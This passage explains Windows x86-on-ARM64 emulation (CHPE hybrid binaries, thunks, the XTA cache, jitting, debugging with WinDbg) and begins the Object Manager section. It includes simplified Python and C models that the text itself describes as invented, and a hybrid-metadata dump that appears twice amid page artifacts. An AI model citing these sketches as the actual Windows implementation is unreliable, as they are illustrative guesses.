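print(is_chpe(0x10001800), is_chpe(0x10004000))  # True False
```

A constant-time per-page lookup like this lets the jitter decide instantly whether a target address is precompiled hybrid code or must be jitted.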
The simulator thread initialization routine (BtCpuThreadInit) initializes the compiler and allocates
the per-thread CPU state on the native stack, an important data structure that contains the per-thread
compiler state, including the x86 thread context, the x86 code emitter state, the internal code cache, and the configuration of the emulated x86 CPU.
Simulator’s image load notification
Unlike any other binary translator, the x86-on-ARM64 CPU simulator must be informed any time a new
image is mapped in the process address space, including for the CHPE Ntdll. This is achieved thanks to
the WoW64 core, which intercepts when the NtMapViewOfSection native API is called from the 32-bit
code and informs the Xtajit simulator through the exported BTCpuNotifyMapViewOfSection routine. It
needs to update its internal image-related data, such as
■ The CHPE bitmap (which needs to be updated by setting bits to 1 when the target image
contains CHPE code pages)
■ The XTA cache state for the image
In particular, whenever a new x86 or CHPE image is loaded, the simulator determines whether it
should use the XTA cache for the module (through registry and application compatibility shims.) In case the check succeeds, the simulator updates the global per-process XTA cache state by requesting from the XtaCache service the updated cache for the image. In case the XtaCache service is able to identify and open an updated cache file, it returns a section object that is used to speed up the execution of the image. (The section contains precompiled ARM64 code blocks.)
Compiled Hybrid Portable Executables (CHPE)
Emulating and jitting x86 code on ARM64 does not always provide enough performance to maintain the application responsiveness. One of the major issues is tied to the
memory ordering differences between the two architectures. The x86 emulator does not know how
the original x86 code has been designed, so it is obliged to aggressively use memory barriers between
each memory access made by the x86 image. Executing memory barriers is a slow operation; on average, it significantly degrades the performance of the emulated application.

These are the motivations behind the design of Compiled Hybrid Portable Executables (CHPE). A
CHPE binary is a special hybrid executable that contains both x86 and ARM64-compatible code, which
has been generated with full awareness of the original source code (the compiler knew exactly where
to use memory barriers). The ARM64-compatible machine code is called hybrid (or CHPE) code: it is
still executed in AArch64 mode but is generated following the 32-bit ABI for a better interoperability
with x86 code.
CHPE binaries are created as standard x86 executables (the machine ID is still 014C as for x86); the
main difference is that they include hybrid code, described by a table in the Hybrid Image metadata (stored as part of the image load configuration directory). When a CHPE image is loaded, the simulator updates the CHPE bitmap by setting the bit corresponding to each page containing hybrid code described by the Hybrid metadata. When the jitter compiles the x86 code
block and detects that the code is trying to invoke a hybrid function, it directly executes it (using the
32-bit stack), without wasting any time in any compilation.
The jitted x86 code is executed following a custom ABI, which means that there is a nonstandard
convention on how the ARM64 registers are used and how parameters are passed between functions.
CHPE code does not follow the same register conventions as jitted code (although hybrid code still
follows a 32-bit ABI). This means that directly invoking CHPE code from the jitted blocks built by the
compiler is not directly possible. To overcome this problem, CHPE binaries also include three different
kinds of thunk functions, which allow the interoperability of CHPE with x86 code:
■ A pop thunk allows x86 code to invoke a hybrid function by converting incoming (or outgoing) arguments from the guest (x86) caller to the CHPE convention and by directly transferring
execution to the hybrid code.
■ A push thunk allows CHPE code to invoke an x86 routine by converting incoming (or outgoing)
arguments from the hybrid code to the guest (x86) convention and by calling the emulator to
resume execution on the x86 code.
■ An export thunk is a compatibility thunk created for supporting applications that detour x86
functions for modifying their functionality. Functions exported from CHPE modules still contain
a little amount of x86 code (usually 8 bytes), which semantically does not provide any sort of
functionality but allows detours to be inserted by the external application.
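The role of the pop and push thunks can be modeled as adapters between two calling conventions. The "conventions" below (a stack list for the guest, a register tuple for hybrid code) and both sample functions are invented purely for illustration:

```python
def chpe_function(args_in_registers):
    """Hybrid code: expects its arguments in 'registers' (a tuple)."""
    return sum(args_in_registers)

def x86_function(stack):
    """Guest code: expects its arguments on the 'stack' (a list)."""
    return max(stack)

def pop_thunk(stack_args):
    """x86 caller -> hybrid callee: move stack arguments into registers."""
    return chpe_function(tuple(stack_args))

def push_thunk(reg_args):
    """Hybrid caller -> x86 callee: spill register arguments to the stack."""
    return x86_function(list(reg_args))

print(pop_thunk([1, 2, 3]))   # 6
print(push_thunk((4, 9, 2)))  # 9
```

Each thunk's only job is argument conversion plus a transfer of control, which is why CHPE and jitted code can interoperate despite following different register conventions.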
The x86-on-ARM simulator makes the best effort to always load CHPE system binaries instead of stan-
dard x86 ones, but this is not always possible. In case a CHPE binary does not exist, the simulator will load
the standard x86 one from the SysWow64 folder. In this case, the OS module will be jitted entirely.
EXPERIMENT: Dumping the hybrid code address range table

The Microsoft Incremental linker (link.exe) tool is able to dump the hybrid metadata of a CHPE
image. More information about the tool and how to install it are available in Chapter 9. In this
experiment, you will dump the hybrid metadata of kernelbase.dll, a system library that also has
been compiled with CHPE support. You also can try the experiment with other CHPE libraries.
After installing the tool, open a command prompt and type the following commands:
cd c:\Windows\SyChpe32
link /dump /loadconfig kernelbase.dll > kernelbase_loadconfig.txt
Open the generated kernelbase_loadconfig.txt file with Notepad and scroll down until you reach the following text:
Section contains the following hybrid metadata:
4 Version
102D900C Address of WowA64 exception handler function pointer
102D9000 Address of WowA64 dispatch call function pointer
102D9004 Address of WowA64 dispatch indirect call function pointer
102D9008 Address of WowA64 dispatch indirect call function pointer (with CFG check)
102D9010 Address of WowA64 dispatch return function pointer
102D9014 Address of WowA64 dispatch leaf return function pointer
102D9018 Address of WowA64 dispatch jump function pointer
102DE000 Address of WowA64 auxiliary import address table pointer
1011DAC8 Hybrid code address range table
4 Hybrid code address range count
Hybrid Code Address Range Table
Address Range
----------------------
x86 10001000 - 1000828F (00001000 - 0000828F)
arm64 1011E2E0 - 1029E09E (0011E2E0 - 0029E09E)
x86 102BA000 - 102BB865 (002BA000 - 002BB865)
arm64 102BC000 - 102C0097 (002BC000 - 002C0097)
The tool found four different ranges in the hybrid code address range table: two sections contain x86 code (actually not used by the simulator), and two contain CHPE code (the tool shows the term “arm64” erroneously.)
The XTA cache
As introduced in the previous sections, the x86-on-ARM64 simulator, other than its internal per-thread
cache, uses an external global cache called XTA cache, managed by the XtaCache protected service,
which implements the lazy jitter. The service is an automatic start service, which, when started, opens (or creates) its cache folder and protects it through a proper ACL (only the XtaCache service and members of the Administrators group have access to the folder). The service starts its own ALPC server and allocates the ALPC and lazy jit worker threads before exiting.
The ALPC worker thread is responsible for dispatching all the incoming requests to the ALPC server.
In particular, when the simulator (the client), running in the context of a WoW64 process, connects to
the XtaCache service, a new data structure tracking the x86 process is created and stored in an internal list, together with a section object shared between the client and the XtaCache service (the memory backing the section is internally called Trace buffer). The section is used by the simulator
to send hints about the x86 code that has been jitted to execute the application and was not present in
any cache, together with the module ID to which they belong. The information stored in the section is
-
with Notepad and scroll down until you reach the following text:
Section contains the following hybrid metadata:
4 Version
102D900C Address of WowA64 exception handler function pointer
102D9000 Address of WowA64 dispatch call function pointer
102D9004 Address of WowA64 dispatch indirect call function pointer
102D9008 Address of WowA64 dispatch indirect call function pointer (with CFG check)
102D9010 Address of WowA64 dispatch return function pointer
102D9014 Address of WowA64 dispatch leaf return function pointer
102D9018 Address of WowA64 dispatch jump function pointer
102DE000 Address of WowA64 auxiliary import address table pointer
1011DAC8 Hybrid code address range table
4 Hybrid code address range count
Hybrid Code Address Range Table
Address Range
----------------------
x86 10001000 - 1000828F (00001000 - 0000828F)
arm64 1011E2E0 - 1029E09E (0011E2E0 - 0029E09E)
x86 102BA000 - 102BB865 (002BA000 - 002BB865)
arm64 102BC000 - 102C0097 (002BC000 - 002C0097)
Four entries are displayed in the hybrid code address range table: two sections contain x86 code (actually not used by the simulator), and two contain CHPE code (the tool erroneously shows the term "arm64").
CHAPTER 8 System mechanisms
119
The list written through the Trace buffer is processed by the XTA cache every second, or earlier in case the buffer becomes full. Based on the number of valid entries in the list, the XtaCache can decide to directly start the lazy jitter.
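The flush policy just described (drain the Trace buffer on a periodic scan, or immediately when it fills up) can be sketched as follows. The structure layout and names are illustrative, not the actual XtaCache data structures:

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical trace-buffer entry: the RVA of a jitted x86 block plus the
 * ID of the module it belongs to (names are invented for illustration). */
typedef struct {
    unsigned int module_id;
    unsigned int block_rva;
} TraceEntry;

#define TRACE_CAPACITY 4   /* kept tiny for demonstration */

typedef struct {
    TraceEntry entries[TRACE_CAPACITY];
    size_t     count;
    size_t     flushes;    /* how many times the lazy jitter was kicked */
} TraceBuffer;

/* Drain the buffer, as the XtaCache would when starting the lazy jitter. */
static void flush(TraceBuffer *tb) {
    tb->count = 0;
    tb->flushes++;
}

/* Producer side: the simulator records a jitted block; a full buffer is
 * flushed immediately rather than waiting for the periodic scan. */
static void record_block(TraceBuffer *tb, unsigned int mod, unsigned int rva) {
    tb->entries[tb->count].module_id = mod;
    tb->entries[tb->count].block_rva = rva;
    if (++tb->count == TRACE_CAPACITY)
        flush(tb);
}

/* Consumer side: the periodic (1-second) tick drains whatever accumulated. */
static void periodic_tick(TraceBuffer *tb) {
    if (tb->count > 0)
        flush(tb);
}
```

The two flush triggers map to the two conditions in the text: the periodic tick models the 1-second scan, while `record_block` models the buffer-full case.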
When a new image is mapped into an x86 process, the WoW64 layer informs the simulator, which sends a request to the XtaCache service. Hashes of the module are then generated based on the executable image path and its internal binary data. The hashes are important because they avoid the execution of jitted blocks compiled for an old, stale version of the executable image.
The XTA cache file name for the module is built from the following components: the module name, the module header hash, the module path hash, a multiprocessor/uniprocessor flag, and the cache file version.
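The naming scheme can be sketched as below. Only the name components are documented here, so the hash algorithm (FNV-1a as a stand-in) and the exact layout, separators, and ".jc" extension are assumptions for illustration:

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Illustrative 32-bit FNV-1a hash, standing in for whatever hash the
 * XtaCache really uses (the actual algorithm is not described here). */
static unsigned int fnv1a(const void *data, size_t len) {
    const unsigned char *p = data;
    unsigned int h = 2166136261u;
    while (len--) { h ^= *p++; h *= 16777619u; }
    return h;
}

/* Compose a cache file name from the documented components:
 * module name, header hash, path hash, multi/uniproc flag, version. */
static void cache_file_name(char *out, size_t outlen,
                            const char *module_name,
                            const void *header, size_t header_len,
                            const char *module_path,
                            int multiproc, unsigned int version) {
    snprintf(out, outlen, "%s.%08X.%08X.%s.%u.jc",   /* layout is assumed */
             module_name,
             fnv1a(header, header_len),              /* module header hash */
             fnv1a(module_path, strlen(module_path)),/* module path hash   */
             multiproc ? "mp" : "up",                /* multi/uniprocessor */
             version);                               /* cache file version */
}
```

Because both hashes enter the file name, a rebuilt or moved executable produces a different name, which is how stale cached translations are naturally skipped.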
The lazy jitter is the engine of the XtaCache. When the service decides to invoke it, a new instance of the XTA compiler (Xtac) is launched in a sandboxed, low-privileged environment (an AppContainer process), which runs in low-priority mode. The only job of the compiler is to compile the x86 code executed by the simulator. The new code blocks are added to the XTA cache file stored in the XtaCache folder.
EXPERIMENT: Witnessing the XTA cache
Newer versions of Process Monitor can run natively on ARM64 environments. You can use Process Monitor to observe how the XtaCache service generates and uses the XTA cache files. In this experiment, you need an ARM64 system running at least Windows 10 May 2019 update (1903). Initially, you need to be sure that the x86 application used for the experiment has never before been executed by the system. In this example, we will install an old x86 version of the MPC-HC media player, which can be downloaded from https://sourceforge.net/projects/mpc-hc/files/latest/download. Any x86 application is well suited for this experiment though.
Install MPC-HC (or your preferred x86 application), but, before running it, open Process Monitor and set a filter on the C:\Windows\XtaCache folder path.
Then launch MPC-HC and try to play some video. Exit MPC-HC and stop the event capturing in Process Monitor. Filter the displayed events on file-system activity (in this experiment, you are not interested in the registry). Because no cache file existed yet, the simulator had to compile the x86 image on its own and periodically sent information to the XtaCache. Later, the lazy jitter would have been invoked by a worker thread in the XtaCache. The latter created a new version of the cache file and granted access to it to both itself and Xtac:
If you restart the experiment, you would see different events in Process Monitor: The cache file is immediately mapped into the process, and the simulator can execute it directly. As a result, the execution time should be faster. You can also try to delete the generated cache files and then launch the MPC-HC x86 application again. To do so, you first need to take ownership of the XtaCache folder: open an administrative command prompt window and insert the following commands:
takeown /f c:\windows\XtaCache
icacls c:\Windows\XtaCache /grant Administrators:F
Jitting and execution
To start the guest process, the x86-on-ARM64 CPU simulator has no choice other than interpreting or jitting the x86 code. Interpreting the guest code means translating and executing one machine instruction at a time, which is a slow process, so the emulator supports only the jitting strategy: It dynamically compiles x86 code to ARM64 and stores the result in a guest "code block" until certain conditions happen:
- An illegal opcode or a data or instruction breakpoint has been detected.
- A branch instruction targeting an already-visited block has been encountered.
- The block is bigger than a predetermined limit (512 bytes).
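The block-building loop with the three termination conditions above can be sketched as follows. The decoded-instruction model and field names are simplified placeholders, not the simulator's real data structures:

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define BLOCK_LIMIT 512  /* predetermined block-size limit, in bytes */

/* Simplified decoded instruction: its size in bytes, plus the two flags
 * that matter for block termination (names are illustrative). */
typedef struct {
    size_t size;
    bool   illegal_or_breakpoint;  /* illegal opcode, or data/insn breakpoint */
    bool   branch_to_visited;      /* branch targeting an already-visited block */
} Insn;

/* Translate instructions into one code block, returning how many
 * instructions were consumed before a termination condition hit. */
static size_t build_block(const Insn *insns, size_t n) {
    size_t block_size = 0, i;
    for (i = 0; i < n; i++) {
        if (insns[i].illegal_or_breakpoint) break;        /* condition 1 */
        if (insns[i].branch_to_visited) { i++; break; }   /* condition 2 */
        block_size += insns[i].size;
        if (block_size > BLOCK_LIMIT) break;              /* condition 3 */
    }
    return i;
}
```

Note the asymmetry: the branch that ends a block is still part of it, whereas an illegal opcode or breakpoint stops translation before the offending instruction.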
The simulation starts by checking whether a code block describing the target x86 code (indexed by its RVA) already exists. If the block exists in the cache, the simulator directly executes it using a dispatcher routine, which builds the ARM64 context (containing the host registers' values) and stores it in the 64-bit stack, switches to the 32-bit stack, and prepares it for the guest x86 thread state. The routine works in a way similar to the pop thunk used for transferring the execution from a CHPE to an x86 context.
When the execution of the code block ends, the dispatcher does the opposite: It saves the new x86
context in the 32-bit stack, switches to the 64-bit stack, and restores the old ARM64 context containing
the state of the simulator. When the dispatcher exits, the simulator knows the exact x86 virtual address
where the execution was interrupted. It can then restart the emulation starting from that new memory
address. Similar to cached entries, the simulator checks whether the target address points to a memory page containing CHPE code (it knows this information thanks to the global CHPE bitmap). If that is the case, the simulator resolves the corresponding code block from the cache and directly executes it, which is as fast as executing native images. Otherwise, it needs to invoke the compiler for building the native translated code block. The compilation process is split into three phases:
1. The parsing stage builds instruction descriptors for each opcode that needs to be added in the code block.
2. The optimization stage optimizes the generated flow of instructions.
3. The code generation stage emits the final ARM64 machine code in the new code block.
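The dispatcher's save/restore dance described earlier (save the ARM64 context, switch to the guest state, run the block, then record where the guest stopped and restore the simulator context) can be sketched abstractly. The context layouts and function names here are invented for illustration:

```c
#include <assert.h>

/* Minimal stand-ins for the host (ARM64) and guest (x86) register state. */
typedef struct { unsigned long long sp, pc; } Arm64Context;
typedef struct { unsigned int esp, eip; } X86Context;

typedef struct {
    Arm64Context host;   /* saved simulator state (64-bit stack side) */
    X86Context   guest;  /* guest thread state (32-bit stack side) */
} Dispatcher;

/* Run one jitted block: save the host state, execute with the guest
 * context, then capture where the guest stopped so emulation resumes there. */
static unsigned int dispatch_block(Dispatcher *d,
                                   unsigned int (*block)(X86Context *)) {
    Arm64Context saved = d->host;              /* save ARM64 context      */
    unsigned int next_eip = block(&d->guest);  /* run on the guest state  */
    d->guest.eip = next_eip;                   /* record interruption EIP */
    d->host = saved;                           /* restore simulator state */
    return next_eip;                           /* simulator resumes here  */
}

/* Example "jitted block": touches the guest stack and reports the next EIP. */
static unsigned int demo_block(X86Context *c) {
    c->esp -= 4;
    return c->eip + 0x20;
}
```

The key property mirrored from the text is that, when the dispatcher returns, the simulator knows the exact x86 virtual address where execution was interrupted and can restart emulation from it.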
The generated code block is then added to the per-thread local cache. Note that the simulator cannot add it to the XTA cache, mainly for security and performance reasons. Otherwise, an attacker would be allowed to pollute the cache of a higher-privileged process (as a result, the malicious code could have potentially been executed in the context of the higher-privileged process). Furthermore, the simulator does not have enough CPU time to generate highly optimized code (even though there is an optimization stage).
However, information about the compiled x86 blocks, together with the ID of the binary hosting the x86 code, is inserted into the list mapped by the shared Trace buffer. Thanks to the Trace buffer, the lazy jitter of the XTA cache knows that it needs to compile the x86 code jitted by the simulator. It does so in the background and stores the result in the XTA cache file; because it is not subject to the simulator's time constraints, it can generate code blocks that are more optimized than the others.
System calls and exception dispatching
Under the x86-on-ARM64 CPU simulator, when an x86 thread performs a system call, it invokes the
code located in the syscall page allocated by the simulator, which raises the exception 0x2E. Each x86
exception forces the code block to exit. The dispatcher, while exiting from the code block, dispatches
the exception through an internal function that ends up in invoking the standard WoW64 exception
handler or system call dispatcher (depending on the exception vector number). These have already been discussed in the previous "x86 simulation on AMD64 platforms" section of this chapter.
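The vector-based routing at block exit can be sketched as a simple switch. Vector 0x2E is the one named in the text for system calls; the handler destinations are placeholders:

```c
#include <assert.h>

#define VECTOR_SYSCALL 0x2E  /* raised by the code in the syscall page */

typedef enum { HANDLED_SYSCALL, HANDLED_EXCEPTION } Dispatched;

/* At code-block exit, route the pending event either to the system-call
 * dispatcher or to the standard WoW64 exception handler, based on the
 * exception vector number (a simplified model of the internal function). */
static Dispatched dispatch_exit_event(unsigned int vector) {
    if (vector == VECTOR_SYSCALL)
        return HANDLED_SYSCALL;    /* WoW64 system service dispatching */
    return HANDLED_EXCEPTION;      /* standard WoW64 exception handler */
}
```

This mirrors the design point in the text: both system calls and faults share one exit path from the jitted block, and only the vector number decides which WoW64 handler runs.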
EXPERIMENT: Debugging WoW64 in ARM64 environments
Newer releases of WinDbg (the Windows Debugger) are able to debug machine code run under
any simulator. This means that in ARM64 systems, you will be able to debug native ARM64, ARM
Thumb-2, and x86 applications, whereas in AMD64 systems, you can debug only 32- and 64-bit
x86 programs. The debugger is also able to easily switch between the native 64-bit and 32-bit
stacks, which allows the user to debug both native (including the WoW64 layer and the emulator)
and guest code (furthermore, the debugger also supports CHPE.)
In this experiment, you will open an x86 application using an ARM64 machine and switch between the native 64-bit context and the 32-bit guest context. WinDbg is available through the Windows SDK or the WDK; after installing one of the kits, open the ARM64 version of Windbg (available from the Start menu). Before starting the debug session, you need to disable the exceptions that the CPU simulator generates, like Data Misaligned and in-page I/O errors (these exceptions are already handled by the simulator itself). From the Debug menu, click Event Filters, select the Data Misaligned event, and check the Ignore option box from the Execution group. Repeat the same for the In-page I/O error event.
Click Close, and then from the main debugger interface, select Open Executable from the File menu and choose one of the 32-bit x86 executables located in the %SystemRoot%\SysWOW64 folder. (In this example, we are using notepad.exe, but any x86 application works.) Also open the disassembly window and verify that the debugger symbols are configured correctly (refer to the https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/symbol-path page for more details). After the initial breakpoint, display the stack via the k command:
0:000> k
# Child-SP
RetAddr
Call Site
00 00000000`001eec70 00007ffb`bd47de00 ntdll!LdrpDoDebuggerBreak+0x2c
01 00000000`001eec90 00007ffb`bd47133c ntdll!LdrpInitializeProcess+0x1da8
02 00000000`001ef580 00007ffb`bd428180 ntdll!_LdrpInitialize+0x491ac
03 00000000`001ef660 00007ffb`bd428134 ntdll!LdrpInitialize+0x38
04 00000000`001ef680 00000000`00000000 ntdll!LdrInitializeThunk+0x14
The simulator is still not loaded at this time: The native and CHPE Ntdll have been mapped
into the target binary by the NT kernel, while the WoW64 core binaries have been loaded by the
native Ntdll just before the breakpoint via the LdrpLoadWow64 function. You can check that by
enumerating the currently loaded modules (via the lm command) and by moving to the next
frame in the stack via the .f+ command. In the disassembly window, you should see the invoca-
tion of the LdrpLoadWow64 routine:
00007ffb`bd47dde4 97fed31b bl
ntdll!LdrpLoadWow64 (00007ffb`bd432a50)
Now resume the execution with the g command (or F5 key). You should see multiple modules being loaded in the process address space and another breakpoint being raised, this time under the x86 context. If you again display the stack via the k command, you can notice that a new column, Arch, is shown:
0:000:x86> k
# Arch ChildEBP RetAddr
00 x86 00acf7b8 77006fb8 ntdll_76ec0000!LdrpDoDebuggerBreak+0x2b
01 CHPE 00acf7c0 77006fb8 ntdll_76ec0000!#LdrpDoDebuggerBreak$push_thunk+0x48
02 CHPE 00acf820 76f44054 ntdll_76ec0000!#LdrpInitializeProcess+0x20ec
03 CHPE 00acfad0 76f43e9c ntdll_76ec0000!#_LdrpInitialize+0x1a4
04 CHPE 00acfb60 76f43e34 ntdll_76ec0000!#LdrpInitialize+0x3c
05 CHPE 00acfb80 76ffc3cc ntdll_76ec0000!LdrInitializeThunk+0x14
If you compare the new stack to the old one, you will see that the stack addresses have drastically changed (because the process is now executing using the 32-bit stack). Note also that some function names are prefixed with a # symbol, which the debugger uses to mark functions containing CHPE code. At this point, you can step into and over x86 code, as in regular x86 operating systems.
operating systems. The simulator takes care of the emulation and hides all the details. To observe
how the simulator is running, you should move to the 64-bit context through the .effmach
command. The command accepts different parameters: x86 for the 32-bit x86 context; arm64 or
amd64 for the native 64-bit context (depending on the target platform); arm for the 32-bit ARM
Thumb2 context; CHPE for the 32-bit CHPE context. Switching to the 64-bit stack in this case is
achieved via the arm64 parameter:
0:000:x86> .effmach arm64
Effective machine: ARM 64-bit (AArch64) (arm64)
0:000> k
# Child-SP
RetAddr
Call Site
00 00000000`00a8df30 00007ffb`bd3572a8 wow64!Wow64pNotifyDebugger+0x18f54
01 00000000`00a8df60 00007ffb`bd3724a4 wow64!Wow64pDispatchException+0x108
02 00000000`00a8e2e0 00000000`76e1e9dc wow64!Wow64RaiseException+0x84
03 00000000`00a8e400 00000000`76e0ebd8 xtajit!BTCpuSuspendLocalThread+0x24c
04 00000000`00a8e4c0 00000000`76de04c8 xtajit!BTCpuResetFloatingPoint+0x4828
05 00000000`00a8e530 00000000`76dd4bf8 xtajit!BTCpuUseChpeFile+0x9088
06 00000000`00a8e640 00007ffb`bd3552c4 xtajit!BTCpuSimulate+0x98
07 00000000`00a8e6b0 00007ffb`bd353788 wow64!RunCpuSimulation+0x14
08 00000000`00a8e6c0 00007ffb`bd47de38 wow64!Wow64LdrpInitialize+0x138
09 00000000`00a8e980 00007ffb`bd47133c ntdll!LdrpInitializeProcess+0x1de0
0a 00000000`00a8f270 00007ffb`bd428180 ntdll!_LdrpInitialize+0x491ac
0b 00000000`00a8f350 00007ffb`bd428134 ntdll!LdrpInitialize+0x38
0c 00000000`00a8f370 00000000`00000000 ntdll!LdrInitializeThunk+0x14
The stack shows that a push thunk has been invoked to restart the simulation at the LdrpDoDebuggerBreak x86 function, which caused an exception (managed through the native Wow64RaiseException function) that has been forwarded to the debugger via the Wow64pNotifyDebugger routine. With Windbg and the .effmach command,
you can effectively debug multiple contexts: native, CHPE, and x86 code. Using the g @$exen-
try command, you can move to the x86 entry point of Notepad and continue the debug session
of x86 code or the emulator itself. You can restart this experiment also in different environments,
debugging an app located in SysArm32, for example.
Object Manager
As mentioned in Chapter 2 of Part 1, “System architecture,” Windows implements an object model to
provide consistent and secure access to the various internal services implemented in the executive. This
section describes the Windows Object Manager, the executive component responsible for creating,
deleting, protecting, and tracking objects. The Object Manager centralizes resource control operations
that otherwise would be scattered throughout the operating system. It was designed to meet the goals
listed after the experiment.
EXPERIMENT: Exploring the Object Manager
Throughout this section, you'll find experiments that show you how to peer into the Object Manager database. These experiments use the following tools, which you should become familiar with if you aren't already:
- WinObj (available from Sysinternals) displays the internal Object Manager's namespace and information about objects (such as the reference count, the number of open handles, security descriptors, and so forth). WinObjEx64, available on GitHub, is a similar tool with more advanced functionality and is open source but not endorsed or signed by Microsoft.
- Process Explorer and Handle from Sysinternals, as well as Resource Monitor (introduced in Chapter 1 of Part 1), display the open handles for a process. Process Hacker is another tool that shows open handles and can show additional details for certain kinds of objects.
- The kernel debugger !handle extension displays the open handles for a process, as does the Io.Handles data model object underneath a Process such as @$curprocess.
WinObj and WinObjEx64 provide a way to traverse the namespace that the Object Manager maintains.
The Windows Openfiles /query command requires that a Windows global flag called maintain objects list be enabled. (See the "Windows global flags" section later in this chapter for more details about global flags.) If you type Openfiles /Local, it tells you whether the flag is enabled. You can enable it with the Openfiles /Local ON command, but you still need to reboot the system for the setting to take effect. Process Explorer, Handle, and Resource Monitor do not require object tracking to be turned on because they query all system handles and create a per-process object list. Process Hacker queries per-process handles directly and does not require the flag either.
The Object Manager was designed to meet the following goals:
- Provide a common, uniform mechanism for using system resources.
- Isolate object protection to one location in the operating system to ensure uniform and consistent object access policy.
- Provide a mechanism to charge processes for their use of objects so that limits can be placed on the usage of system resources.
- Establish an object-naming scheme that can readily incorporate existing objects, such as the devices, files, and directories of a file system, or other independent collections of names.
- Support the requirements of various operating system environments, such as the ability of a process to inherit resources from a parent process (needed by Windows and Subsystem for UNIX Applications) and the ability to create case-sensitive file names (needed by Subsystem for UNIX Applications). Although Subsystem for UNIX Applications no longer exists, these facilities were also useful for the later development of the Windows Subsystem for Linux.
- Establish uniform rules for object retention (that is, for keeping an object available until all processes have finished using it).
- Provide the ability to isolate objects for a specific session to allow for both local and global objects in the namespace.
- Allow redirection of object names and paths through symbolic links and allow object owners, such as the file system, to implement their own type of redirection mechanisms (such as NTFS junction points). Combined, these redirection mechanisms compose what is called reparsing.
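The retention goal above (keep an object available until everyone is done with it) can be sketched with the two counters the Object Manager actually tracks per object, handles and pointer references. The structure is heavily simplified; in particular, real handle operations also manipulate the reference count:

```c
#include <assert.h>
#include <stdbool.h>

/* Simplified object header: real headers carry much more state. */
typedef struct {
    int  handle_count;     /* open handles held by processes        */
    int  reference_count;  /* kernel-mode pointer references        */
    bool deleted;          /* set when the object has been destroyed */
} ObjectHeader;

/* Uniform retention rule: the object is destroyed only when both
 * counts drop to zero, regardless of object type. */
static void check_retention(ObjectHeader *o) {
    if (o->handle_count == 0 && o->reference_count == 0)
        o->deleted = true;
}

static void close_handle(ObjectHeader *o) {
    o->handle_count--;
    check_retention(o);
}

static void dereference(ObjectHeader *o) {
    o->reference_count--;
    check_retention(o);
}
```

The point of the sketch is that the rule lives in one place (`check_retention`), which is exactly the "isolate object lifetime policy to one location" design the goals describe.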
Internally, Windows has three primary types of objects: executive objects, kernel objects, and GDI/User objects. Executive objects are objects implemented by various components of the executive (such as the process manager, memory manager, I/O subsystem, and so on). Kernel objects are a more primitive set of objects implemented by the Windows kernel. These objects are not visible to user-mode code but are created and used only within the executive. Kernel objects provide fundamental capabilities, such as synchronization, on which executive objects are built. Thus, many executive objects contain (encapsulate) one or more kernel objects, as shown in Figure 8-30.
Note The vast majority of GDI/User objects, on the other hand, belong to the Windows subsystem (Win32k.sys) and do not interact with the kernel. For this reason, they are outside the scope of this book, but you can get more information on them from the Windows SDK documentation. Two exceptions are the Desktop and Windows Station User objects, which are wrapped in executive objects, as well as the majority of DirectX objects (Shaders, Surfaces, Compositions), which are also wrapped as executive objects.
[The figure shows an executive object whose body encapsulates a kernel object. The kernel object's fields — Name, HandleCount, ReferenceCount, Type — are owned by the Object Manager; the kernel object itself is owned by the kernel; the surrounding executive object is owned by the executive.]
FIGURE 8-30 Executive objects that contain kernel objects.
Details about the structure of kernel objects and how they are used to implement synchronization are given later in this chapter. The remainder of this section focuses on how the Object Manager works and on the structure of executive objects, handles, and handle tables. This section just briefly describes how objects are involved in implementing Windows security access checking; Chapter 7 of Part 1 thoroughly covers that topic.
Executive objects
Each Windows environment subsystem projects to its applications a different image of the operating
system. The executive objects and object services are primitives that the environment subsystems use
to construct their own versions of objects and other resources.
Executive objects are typically created either by an environment subsystem on behalf of a user application or by various components of the operating system as part of their normal operation. For example, to create a file, a Windows application calls the Windows CreateFileW function, implemented in the Windows subsystem DLL Kernelbase.dll. After some validation and initialization, CreateFileW in turn calls the native Windows service NtCreateFile to create an executive file object.
The set of objects an environment subsystem supplies to its applications might be larger or smaller than the set the executive provides. The Windows subsystem uses executive objects to export its own set of objects, many of which correspond directly to executive objects. For example, the Windows mutexes and semaphores are directly based on executive objects (which, in turn, are based on corresponding kernel objects). In addition, the Windows subsystem supplies named pipes and mailslots, which are resources based on executive file objects. When leveraging the Windows Subsystem for Linux (WSL), its subsystem driver (Lxcore.sys) uses executive objects and services as the basis for presenting Linux-style processes, pipes, and other resources to its applications.
Table 8-15 lists the primary objects the executive provides and briefly describes what they represent. You can find further details about executive objects in the chapters that describe the related executive components (or, in the case of executive objects directly exported to Windows, in the Windows API reference documentation). You can see the full list of object types by running Winobj with elevated rights and navigating to the ObjectTypes directory.
Note The executive implements a total of about 69 object types (depending on the Windows version). Some of these objects are for use only by the executive component that creates them and are not directly accessible by Windows APIs. Examples of these objects include Driver, Callback, and Adapter.
TABLE 8-15 Executive objects exposed to the Windows API
Object Type — Represents
Process — The virtual address space and control information necessary for the execution of a set of thread objects.
Thread — An executable entity within a process.
Job — A collection of processes manageable as a single entity through the job.
Section — An object that represents a region of shared memory (known as a file-mapping object in the Windows API).
Token — The security profile (security ID, user rights, and so on) of a process or a thread.
Event, KeyedEvent — An object with a persistent state (signaled or not signaled) that can be used for synchronization or notification. The latter allows a global key to be used to reference the underlying synchronization primitive, avoiding memory usage, making it usable in low-memory conditions by avoiding an allocation.
Semaphore — A counter that provides a resource gate by allowing some maximum number of threads to access the resources protected by the semaphore.
Mutex — A synchronization mechanism used to serialize access to a resource.
Timer, IRTimer — A mechanism to notify a thread when a fixed period of time elapses. The latter objects, called Idle Resilient Timers, are used by UWP applications and certain services to create timers that are not affected by Connected Standby.
IoCompletion, IoCompletionReserve — A method for threads to enqueue and dequeue notifications of the completion of I/O operations (known as an I/O completion port in the Windows API). The latter allows preallocation of the port to combat low-memory situations.
Key — A mechanism to refer to data in the registry. Although keys appear in the Object Manager namespace, they are managed by the configuration manager, in a way similar to that in which file objects are managed by file system drivers. Zero or more key values are associated with a key object; key values contain data about the key.
Directory — A virtual directory in the Object Manager's namespace responsible for containing other objects or object directories.
SymbolicLink — A virtual name redirection link between an object in the namespace and another object.
TpWorkerFactory — A collection of threads assigned to perform a specific set of tasks. The kernel can manage the number of work items that will be performed on the queue, how many threads should be responsible for the work, and dynamic creation and termination of worker threads, respecting certain limits the caller can set. Windows exposes the worker factory object through thread pools.
